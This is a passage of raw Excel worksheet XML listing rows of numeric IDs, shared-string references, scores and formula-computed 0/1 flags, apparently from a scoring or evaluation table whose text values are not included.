      <c r="O22" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="62">
        <v>5081.0</v>
      </c>
      <c r="B23" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C23" s="63" t="s">
        <v>215</v>
      </c>
      <c r="D23" s="62" t="s">
        <v>216</v>
      </c>
      <c r="E23" s="62" t="s">
        <v>217</v>
      </c>
      <c r="F23" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G23" s="62">
        <v>0.8</v>
      </c>
      <c r="H23" s="64">
        <v>1.0</v>
      </c>
      <c r="I23" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J23" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K23" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L23" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O23" s="62">
        <v>1.0</v>
      </c>
      <c r="Q23" s="62" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="62">
        <v>5093.0</v>
      </c>
      <c r="B24" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C24" s="63" t="s">
        <v>219</v>
      </c>
      <c r="D24" s="62" t="s">
        <v>220</v>
      </c>
      <c r="E24" s="62" t="s">
        <v>221</v>
      </c>
      <c r="F24" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G24" s="62">
        <v>0.9</v>
      </c>
      <c r="H24" s="64">
        <v>0.0</v>
      </c>
      <c r="I24" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J24" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K24" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L24" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O24" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="62">
        <v>5099.0</v>
      </c>
      <c r="B25" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C25" s="63" t="s">
        <v>222</v>
      </c>
      <c r="D25" s="62" t="s">
        <v>223</v>
      </c>
      <c r="E25" s="62" t="s">
        <v>224</v>
      </c>
      <c r="F25" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G25" s="62">
        <v>0.9</v>
      </c>
      <c r="H25" s="64">
        <v>1.0</v>
      </c>
      <c r="I25" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J25" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K25" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L25" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O25" s="62">
        <v>1.0</v>
      </c>
      <c r="Q25" s="62" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="62">
        <v>5110.0</v>
      </c>
      <c r="B26" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C26" s="63" t="s">
        <v>226</v>
      </c>
      <c r="D26" s="62" t="s">
        <v>227</v>
      </c>
      <c r="E26" s="62" t="s">
        <v>228</v>
      </c>
      <c r="F26" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G26" s="62">
        <v>0.9</v>
      </c>
      <c r="H26" s="64">
        <v>0.0</v>
      </c>
      <c r="I26" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J26" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K26" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L26" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O26" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="62">
        <v>5478.0</v>
      </c>
      <c r="B27" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C27" s="63" t="s">
        <v>229</v>
      </c>
      <c r="D27" s="62" t="s">
        <v>230</v>
      </c>
      <c r="E27" s="62" t="s">
        <v>231</v>
      </c>
      <c r="F27" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G27" s="62">
        <v>0.9</v>
      </c>
      <c r="H27" s="64">
        <v>1.0</v>
      </c>
      <c r="I27" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J27" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K27" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L27" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O27" s="62">
        <v>1.0</v>
      </c>
      <c r="Q27" s="62" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="62">
        <v>5528.0</v>
      </c>
      <c r="B28" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C28" s="63" t="s">
        <v>233</v>
      </c>
      <c r="D28" s="62" t="s">
        <v>234</v>
      </c>
      <c r="E28" s="62" t="s">
        <v>235</v>
      </c>
      <c r="F28" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G28" s="62">
        <v>0.9</v>
      </c>
      <c r="H28" s="64">
        <v>1.0</v>
      </c>
      <c r="I28" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J28" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K28" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L28" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M28" s="62" t="s">
        <v>236</v>
      </c>
      <c r="N28" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O28" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="62">
        <v>5717.0</v>
      </c>
      <c r="B29" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C29" s="63" t="s">
        <v>237</v>
      </c>
      <c r="D29" s="62" t="s">
        <v>238</v>
      </c>
      <c r="E29" s="62" t="s">
        <v>239</v>
      </c>
      <c r="F29" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G29" s="62">
        <v>0.9</v>
      </c>
      <c r="H29" s="64">
        <v>1.0</v>
      </c>
      <c r="I29" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J29" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K29" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L29" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M29" s="62" t="s">
        <v>240</v>
      </c>
      <c r="N29" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O29" s="62">
        <v>1.0</v>
      </c>
      <c r="Q29" s="62" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="62">
        <v>5744.0</v>
      </c>
      <c r="B30" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C30" s="63" t="s">
        <v>242</v>
      </c>
      <c r="D30" s="62" t="s">
        <v>243</v>
      </c>
      <c r="E30" s="62" t="s">
        <v>244</v>
      </c>
      <c r="F30" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G30" s="62">
        <v>0.9</v>
      </c>
      <c r="H30" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I30" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J30" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K30" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L30" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O30" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="62">
        <v>5882.0</v>
      </c>
      <c r="B31" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C31" s="63" t="s">
        <v>245</v>
      </c>
      <c r="D31" s="62" t="s">
        <v>246</v>
      </c>
      <c r="E31" s="62" t="s">
        <v>247</v>
      </c>
      <c r="F31" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G31" s="62">
        <v>0.85</v>
      </c>
      <c r="H31" s="64">
        <v>1.0</v>
      </c>
      <c r="I31" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J31" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K31" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L31" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O31" s="62">
        <v>1.0</v>
      </c>
      <c r="Q31" s="62" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="62">
        <v>5964.0</v>
      </c>
      <c r="B32" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C32" s="63" t="s">
        <v>249</v>
      </c>
      <c r="D32" s="62" t="s">
        <v>250</v>
      </c>
      <c r="E32" s="62" t="s">
        <v>251</v>
      </c>
      <c r="F32" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G32" s="62">
        <v>0.9</v>
      </c>
      <c r="H32" s="64">
        <v>1.0</v>
      </c>
      <c r="I32" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J32" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K32" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L32" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O32" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="62">
        <v>5983.0</v>
      </c>
      <c r="B33" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C33" s="63" t="s">
        <v>252</v>
      </c>
      <c r="D33" s="62" t="s">
        <v>253</v>
      </c>
      <c r="E33" s="62" t="s">
        <v>254</v>
      </c>
      <c r="F33" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G33" s="62">
        <v>0.85</v>
      </c>
      <c r="H33" s="64">
        <v>1.0</v>
      </c>
      <c r="I33" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J33" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K33" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L33" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O33" s="62">
        <v>1.0</v>
      </c>
      <c r="Q33" s="62" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="62">
        <v>6049.0</v>
      </c>
      <c r="B34" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C34" s="63" t="s">
        <v>256</v>
      </c>
      <c r="D34" s="62" t="s">
        <v>257</v>
      </c>
      <c r="E34" s="62" t="s">
        <v>258</v>
      </c>
      <c r="F34" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G34" s="62">
        <v>0.9</v>
      </c>
      <c r="H34" s="64">
        <v>1.0</v>
      </c>
      <c r="I34" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J34" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K34" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L34" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O34" s="62">
        <v>1.0</v>
      </c>
      <c r="Q34" s="62" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="62">
        <v>6128.0</v>
      </c>
      <c r="B35" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C35" s="63" t="s">
        <v>260</v>
      </c>
      <c r="D35" s="62" t="s">
        <v>261</v>
      </c>
      <c r="E35" s="62" t="s">
        <v>262</v>
      </c>
      <c r="F35" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G35" s="62">
        <v>0.9</v>
      </c>
      <c r="H35" s="64">
        <v>0.0</v>
      </c>
      <c r="I35" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J35" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K35" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L35" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O35" s="62">
        <v>1.0</v>
      </c>
      <c r="Q35" s="62" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="62">
        <v>6225.0</v>
      </c>
      <c r="B36" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C36" s="63" t="s">
        <v>264</v>
      </c>
      <c r="D36" s="62" t="s">
        <v>265</v>
      </c>
      <c r="E36" s="62" t="s">
        <v>266</v>
      </c>
      <c r="F36" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G36" s="62">
        <v>0.85</v>
      </c>
      <c r="H36" s="64">
        <v>1.0</v>
      </c>
      <c r="I36" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J36" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K36" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L36" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O36" s="62">
        <v>1.0</v>
      </c>
      <c r="Q36" s="62" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="62">
        <v>6267.0</v>
      </c>
      <c r="B37" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C37" s="63" t="s">
        <v>268</v>
      </c>
      <c r="D37" s="62" t="s">
        <v>269</v>
      </c>
      <c r="E37" s="62" t="s">
        <v>270</v>
      </c>
      <c r="F37" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G37" s="62">
        <v>0.9</v>
      </c>
      <c r="H37" s="64">
        <v>1.0</v>
      </c>
      <c r="I37" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J37" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K37" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L37" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O37" s="62">
        <v>1.0</v>
      </c>
      <c r="Q37" s="62" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="62">
        <v>6309.0</v>
      </c>
      <c r="B38" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C38" s="63" t="s">
        <v>272</v>
      </c>
      <c r="D38" s="62" t="s">
        <v>273</v>
      </c>
      <c r="E38" s="62" t="s">
        <v>274</v>
      </c>
      <c r="F38" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G38" s="62">
        <v>0.95</v>
      </c>
      <c r="H38" s="64">
        <v>1.0</v>
      </c>
      <c r="I38" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J38" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K38" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L38" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O38" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="62">
        <v>6324.0</v>
      </c>
      <c r="B39" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C39" s="63" t="s">
        <v>275</v>
      </c>
      <c r="D39" s="62" t="s">
        <v>276</v>
      </c>
      <c r="E39" s="62" t="s">
        <v>277</v>
      </c>
      <c r="F39" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G39" s="62">
        <v>0.9</v>
      </c>
      <c r="H39" s="64">
        <v>0.0</v>
      </c>
      <c r="I39" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J39" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K39" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L39" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O39" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="62">
        <v>6332.0</v>
      </c>
      <c r="B40" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C40" s="63" t="s">
        <v>278</v>
      </c>
      <c r="D40" s="62" t="s">
        <v>279</v>
      </c>
      <c r="E40" s="62" t="s">
        <v>280</v>
      </c>
      <c r="F40" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G40" s="62">
        <v>0.9</v>
      </c>
      <c r="H40" s="64">
        <v>1.0</v>
      </c>
      <c r="I40" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J40" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K40" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L40" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O40" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="62">
        <v>6342.0</v>
      </c>
      <c r="B41" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C41" s="63" t="s">
        <v>281</v>
      </c>
      <c r="D41" s="62" t="s">
        <v>282</v>
      </c>
      <c r="E41" s="62" t="s">
        <v>283</v>
      </c>
      <c r="F41" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G41" s="62">
        <v>0.9</v>
      </c>
      <c r="H41" s="64">
        <v>1.0</v>
      </c>
      <c r="I41" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J41" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K41" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L41" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O41" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="62">
        <v>6362.0</v>
      </c>
      <c r="B42" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C42" s="63" t="s">
        <v>284</v>
      </c>
      <c r="D42" s="62" t="s">
        <v>285</v>
      </c>
      <c r="E42" s="62" t="s">
        <v>286</v>
      </c>
      <c r="F42" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G42" s="62">
        <v>0.9</v>
      </c>
      <c r="H42" s="64">
        <v>1.0</v>
      </c>
      <c r="I42" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J42" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K42" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L42" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M42" s="62" t="s">
        <v>287</v>
      </c>
      <c r="N42" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O42" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="62">
        <v>6365.0</v>
      </c>
      <c r="B43" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C43" s="63" t="s">
        <v>288</v>
      </c>
      <c r="D43" s="62" t="s">
        <v>289</v>
      </c>
      <c r="E43" s="62" t="s">
        <v>290</v>
      </c>
      <c r="F43" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G43" s="62">
        <v>0.8</v>
      </c>
      <c r="H43" s="64">
        <v>1.0</v>
      </c>
      <c r="I43" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J43" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K43" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L43" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O43" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="62">
        <v>6366.0</v>
      </c>
      <c r="B44" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C44" s="63" t="s">
        <v>291</v>
      </c>
      <c r="D44" s="62" t="s">
        <v>292</v>
      </c>
      <c r="E44" s="62" t="s">
        <v>293</v>
      </c>
      <c r="F44" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G44" s="62">
        <v>0.7</v>
      </c>
      <c r="H44" s="64">
        <v>0.0</v>
      </c>
      <c r="I44" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J44" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K44" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L44" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O44" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="62">
        <v>6433.0</v>
      </c>
      <c r="B45" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C45" s="63" t="s">
        <v>294</v>
      </c>
      <c r="D45" s="62" t="s">
        <v>295</v>
      </c>
      <c r="E45" s="62" t="s">
        <v>296</v>
      </c>
      <c r="F45" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G45" s="62">
        <v>0.8</v>
      </c>
      <c r="H45" s="64">
        <v>1.0</v>
      </c>
      <c r="I45" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J45" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K45" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L45" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O45" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="62">
        <v>6460.0</v>
      </c>
      <c r="B46" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C46" s="63" t="s">
        <v>297</v>
      </c>
      <c r="D46" s="62" t="s">
        <v>298</v>
      </c>
      <c r="E46" s="62" t="s">
        <v>299</v>
      </c>
      <c r="F46" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G46" s="62">
        <v>0.9</v>
      </c>
      <c r="H46" s="64">
        <v>1.0</v>
      </c>
      <c r="I46" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J46" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K46" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L46" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O46" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="62">
        <v>6464.0</v>
      </c>
      <c r="B47" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C47" s="63" t="s">
        <v>300</v>
      </c>
      <c r="D47" s="62" t="s">
        <v>301</v>
      </c>
      <c r="E47" s="62" t="s">
        <v>302</v>
      </c>
      <c r="F47" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G47" s="62">
        <v>0.9</v>
      </c>
      <c r="H47" s="64">
        <v>0.0</v>
      </c>
      <c r="I47" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J47" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K47" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L47" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O47" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="62">
        <v>6485.0</v>
      </c>
      <c r="B48" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C48" s="63" t="s">
        <v>303</v>
      </c>
      <c r="D48" s="62" t="s">
        <v>304</v>
      </c>
      <c r="E48" s="62" t="s">
        <v>305</v>
      </c>
      <c r="F48" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G48" s="62">
        <v>0.85</v>
      </c>
      <c r="H48" s="64">
        <v>0.0</v>
      </c>
      <c r="I48" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J48" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K48" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L48" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O48" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="62">
        <v>6492.0</v>
      </c>
      <c r="B49" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C49" s="63" t="s">
        <v>306</v>
      </c>
      <c r="D49" s="62" t="s">
        <v>307</v>
      </c>
      <c r="E49" s="62" t="s">
        <v>308</v>
      </c>
      <c r="F49" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G49" s="62">
        <v>0.8</v>
      </c>
      <c r="H49" s="64">
        <v>1.0</v>
      </c>
      <c r="I49" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J49" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K49" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L49" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O49" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="62">
        <v>6498.0</v>
      </c>
      <c r="B50" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C50" s="63" t="s">
        <v>309</v>
      </c>
      <c r="D50" s="62" t="s">
        <v>310</v>
      </c>
      <c r="E50" s="62" t="s">
        <v>311</v>
      </c>
      <c r="F50" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G50" s="62">
        <v>0.9</v>
      </c>
      <c r="H50" s="64">
        <v>1.0</v>
      </c>
      <c r="I50" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J50" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K50" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L50" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O50" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="62">
        <v>6520.0</v>
      </c>
      <c r="B51" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C51" s="63" t="s">
        <v>312</v>
      </c>
      <c r="D51" s="62" t="s">
        <v>313</v>
      </c>
      <c r="E51" s="62" t="s">
        <v>314</v>
      </c>
      <c r="F51" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G51" s="62">
        <v>0.9</v>
      </c>
      <c r="H51" s="64">
        <v>1.0</v>
      </c>
      <c r="I51" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J51" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K51" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L51" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O51" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="62">
        <v>6630.0</v>
      </c>
      <c r="B52" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C52" s="63" t="s">
        <v>315</v>
      </c>
      <c r="D52" s="62" t="s">
        <v>316</v>
      </c>
      <c r="E52" s="62" t="s">
        <v>317</v>
      </c>
      <c r="F52" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G52" s="62">
        <v>0.95</v>
      </c>
      <c r="H52" s="64">
        <v>1.0</v>
      </c>
      <c r="I52" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J52" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K52" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L52" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O52" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="62">
        <v>6653.0</v>
      </c>
      <c r="B53" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C53" s="63" t="s">
        <v>318</v>
      </c>
      <c r="D53" s="62" t="s">
        <v>319</v>
      </c>
      <c r="E53" s="62" t="s">
        <v>320</v>
      </c>
      <c r="F53" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G53" s="62">
        <v>0.9</v>
      </c>
      <c r="H53" s="64">
        <v>0.0</v>
      </c>
      <c r="I53" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J53" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K53" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L53" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O53" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="62">
        <v>7063.0</v>
      </c>
      <c r="B54" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C54" s="63" t="s">
        <v>321</v>
      </c>
      <c r="D54" s="62" t="s">
        <v>322</v>
      </c>
      <c r="E54" s="62" t="s">
        <v>323</v>
      </c>
      <c r="F54" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G54" s="62">
        <v>0.9</v>
      </c>
      <c r="H54" s="64">
        <v>1.0</v>
      </c>
      <c r="I54" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J54" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K54" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L54" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O54" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="62">
        <v>7191.0</v>
      </c>
      <c r="B55" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C55" s="63" t="s">
        <v>324</v>
      </c>
      <c r="D55" s="62" t="s">
        <v>325</v>
      </c>
      <c r="E55" s="62" t="s">
        <v>326</v>
      </c>
      <c r="F55" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G55" s="62">
        <v>0.9</v>
      </c>
      <c r="H55" s="64">
        <v>1.0</v>
      </c>
      <c r="I55" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J55" s="65">
        <f t="shared" si="1"/>
